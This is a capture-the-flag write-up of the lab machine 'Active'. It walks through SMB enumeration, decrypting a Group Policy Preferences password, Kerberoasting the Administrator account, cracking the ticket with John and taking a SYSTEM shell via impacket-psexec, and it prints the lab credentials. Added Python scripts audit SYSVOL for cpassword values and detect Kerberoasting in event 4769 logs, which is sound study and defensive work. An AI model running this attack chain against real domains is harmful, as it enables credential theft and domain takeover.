# Active

## IP

* LHOST: 10.10.14.15
* RHOST: 10.129.135.20

## Nmap

Port scan:

```
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
```

Script scan:

```
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-09 14:08:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-09T14:09:11
|_  start_date: 2022-07-09T14:05:50
```

Full scan:

```
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49177/tcp open  unknown
```

Script scan on the extra ports (5722, 9389, 47001, 49169, 49171, 49177):

```
PORT      STATE SERVICE VERSION
5722/tcp  open  msrpc   Microsoft Windows RPC
9389/tcp  open  mc-nmf  .NET Message Framing
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49169/tcp open  msrpc   Microsoft Windows RPC
49171/tcp open  msrpc   Microsoft Windows RPC
49177/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## User Flag (SMB Info Leak, GPP)

### SMB Null Session

Enumerate SMB shares:

```shell
$ smbmap -H $IP

[+] IP: 10.129.135.20:445	Name: 10.129.135.20                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS
```

Recursively list directories and files in the share `\Replication`:

```shell
smbmap -H $IP -R Replication --depth 10
```

Note that the `--depth` flag is needed; without it the listing does not recurse deep enough to reach the file we are after. Here we found an interesting file named `Groups.xml`:

![Groups.xml](/files/zLln6fLlZD7uHUcxjHfr)

Download `Groups.xml` to Kali:

```shell
smbmap -H $IP -R Replication --depth 10 -A Groups.xml -q
```

In `Groups.xml`, we found a username `active.htb\SVC_TGS` and a GPP password in the `cpassword` field:

```
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

### GPP Password Decryption

GPP stores the password AES-256 encrypted, but Microsoft published the static key in its own documentation, so the value can be decrypted offline with the `gpp-decrypt` tool built into Kali:

```shell
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

The plaintext password is `GPPstillStandingStrong2k18`. The theory behind this attack is covered in the following post:

{% embed url="https://adsecurity.org/?p=2288" %}
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
{% endembed %}
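As an added example that is not part of this writeup or of `gpp-decrypt`, here is the defender-side counterpart of this step: a small Python audit script that walks a copy of SYSVOL (or the Replication share) and reports every GPP XML element still carrying a `cpassword`, together with the account it applies to. The sample `Groups.xml` is constructed for the example (the `cpassword` value is the one found above; the GPO GUID, attributes and directory layout are illustrative). The script only restores the base64 padding that GPP strips and checks the ciphertext; decryption is left to `gpp-decrypt`.

```python
"""Added example (not from the writeup): audit a SYSVOL/Replication copy for
Group Policy Preference cpassword values."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the Groups.xml found on this box. The cpassword
# value is the one quoted in the writeup; everything else is illustrative.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Attribute that names the account in each GPP file type
# (Groups/Drives, Services, ScheduledTasks, DataSources/Printers).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def cpassword_to_ciphertext(cpassword: str) -> bytes:
    """Restore the base64 padding GPP strips and return the raw AES ciphertext."""
    padded = cpassword + "=" * (-len(cpassword) % 4)
    return base64.b64decode(padded)


def scan_gpp_tree(root: str) -> list:
    """Walk a SYSVOL/Replication copy and report every non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # not a GPP XML file, or damaged; skip it
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if not cpw:
                    continue  # GPP writes cpassword="" when no password is set
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
                findings.append({
                    "file": os.path.relpath(path, root),
                    "account": account,
                    "ciphertext_bytes": len(cpassword_to_ciphertext(cpw)),
                })
    return findings


def build_sample_tree() -> str:
    """Write the constructed Groups.xml into a temp dir laid out like SYSVOL."""
    root = tempfile.mkdtemp(prefix="gpp_audit_")
    gpo = "{31B2F340-016D-11D2-945F-00C04FB984F9}"  # Default Domain Policy GUID, illustrative
    gdir = os.path.join(root, "active.htb", "Policies", gpo, "MACHINE", "Preferences", "Groups")
    os.makedirs(gdir)
    with open(os.path.join(gdir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return root


if __name__ == "__main__":
    for f in scan_gpp_tree(build_sample_tree()):
        print(f"{f['file']}: account={f['account']} ciphertext={f['ciphertext_bytes']} bytes")
```

In a real audit, point `scan_gpp_tree` at a mounted copy of `\\<dc>\SYSVOL\<domain>\Policies`. Any hit is actionable regardless of how old the GPO is: every domain user can read SYSVOL, so the plaintext is recoverable by anyone; the preference item should be removed and the affected account's password rotated.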

### SMB Enumeration with Credential

Enumerate the SMB shares again with the credential we just obtained:

```shell
$ smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

[+] IP: 10.129.135.20:445	Name: 10.129.135.20                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY
```

Recursively list directories and files in the share `\Users`:

```shell
smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10
```

Here we found `user.txt`. Download it to Kali:

```shell
smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 -A user.txt -q
```

## Root Flag (Kerberoast)

Now we have a valid username `SVC_TGS` and its plaintext password `GPPstillStandingStrong2k18`. Any authenticated domain user can request a service ticket for any registered SPN, and that ticket is encrypted with the service account's password-derived key, so in such a scenario we can try **Kerberoast** to obtain a TGS ticket and crack it offline. The theory behind Kerberoast is covered in the following post:

{% embed url="https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#kerberoast" %}
How To Attack Kerberos 101
{% endembed %}

Run Kerberoast with `GetUserSPNs`:

```shell
$ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-07-09 10:06:56.849348

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cff428e912c5afd03d8a2eb0aedfd97b$...
```
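The `$23$` in the hash above is the Kerberos encryption type (23 = RC4-HMAC), which Kerberoast tooling typically asks for because RC4-encrypted tickets are the cheapest to crack. As an added example that is not part of this writeup, the following Python flags exactly that pattern in Windows Security event 4769 (Kerberos service ticket requested): an RC4 service ticket, successfully issued, for a user-type service account, requested by a user account. The event records are constructed for the example in a flattened `field=value` form; the first one mirrors the request made above, the rest are illustrative.

```python
"""Added example (not from the writeup): flag likely Kerberoasting in Windows
Security event 4769 (Kerberos service ticket requested) records."""
import re
from collections import defaultdict

# Constructed sample records in a flattened "field=value" form, one event per
# line. The first line mirrors the request made above: SVC_TGS from 10.10.14.15
# asks for a service ticket to the Administrator account's SPN with RC4
# (etype 0x17), which is what yields a $krb5tgs$23$ hash. The other lines are
# illustrative (TGT request, machine account, a second user, a failed request).
SAMPLE_EVENTS = """\
2022-07-09T14:10:01Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.15
2022-07-09T14:10:02Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.14.15
2022-07-09T14:10:05Z EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::1
2022-07-09T14:10:07Z EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.15
2022-07-09T14:10:08Z EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.15
2022-07-09T14:10:09Z EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x1f IpAddress=::ffff:10.10.14.15
2022-07-09T14:11:00Z EventID=4768 TargetUserName=jdoe@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.14.15
"""

RC4_HMAC = 0x17  # Kerberos etype 23, the "$23$" in a $krb5tgs$ hash
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Split one flattened record into a field dict (timestamp kept under 'time')."""
    timestamp, rest = line.split(" ", 1)
    event = dict(FIELD_RE.findall(rest))
    event["time"] = timestamp
    return event


def is_roast_candidate(event: dict) -> bool:
    """True for a successfully issued RC4 service ticket for a user-type
    service account, requested by a user (not machine) account."""
    if event.get("EventID") != "4769" or event.get("Status") != "0x0":
        return False
    if int(event.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
        return False
    service = event.get("ServiceName", "")
    if service.endswith("$") or service.lower() == "krbtgt":
        return False  # machine accounts and the TGT service are not roast targets
    requester = event.get("TargetUserName", "").split("@")[0]
    return not requester.endswith("$")


def detect_kerberoast(records: str, min_services: int = 1):
    """Return (alerts, summary): one alert per suspicious ticket, plus the
    distinct service accounts each requester/IP pair asked for, kept only
    when the count reaches min_services (raise it to catch bulk roasting)."""
    alerts = []
    per_requester = defaultdict(set)
    for line in records.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        if not is_roast_candidate(event):
            continue
        key = (event["TargetUserName"], event.get("IpAddress", "?"))
        per_requester[key].add(event["ServiceName"])
        alerts.append((event["time"], key[0], key[1], event["ServiceName"]))
    summary = {k: sorted(v) for k, v in per_requester.items() if len(v) >= min_services}
    return alerts, summary


if __name__ == "__main__":
    found, by_requester = detect_kerberoast(SAMPLE_EVENTS)
    for when, who, src, svc in found:
        print(f"{when} RC4 service ticket for {svc} requested by {who} from {src}")
    for (who, src), services in by_requester.items():
        print(f"{who} ({src}) requested {len(services)} roastable ticket(s): {', '.join(services)}")
```

On a real domain controller these fields come from the EventData of 4769. In a domain that otherwise issues AES tickets, a single RC4 ticket for a user-type service account is already a strong signal; the per-requester count catches a tool walking every SPN in one sweep. The fix on the service side is long random passwords (or group managed service accounts) for every account that carries an SPN, with AES-only enforced on those accounts so RC4 tickets are never issued.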

Save the TGS ticket to a file named `hash.txt`:

```shell
impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request -outputfile hash.txt
```

Crack the TGS ticket with John:

```shell
john-rockyou hash.txt
# john-rockyou is presumably a local alias; the plain invocation would be
# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

The plaintext password is `Ticketmaster1968`:

![John](/files/HKa5cBKca8rFplO53vuc)

Use `impacket-psexec` with the Administrator credential to get a SYSTEM shell:

```shell
impacket-psexec active.htb/Administrator:Ticketmaster1968@$IP
```

![SYSTEM shell](/files/rZf5nJJp5dr3mNmDB5AQ)

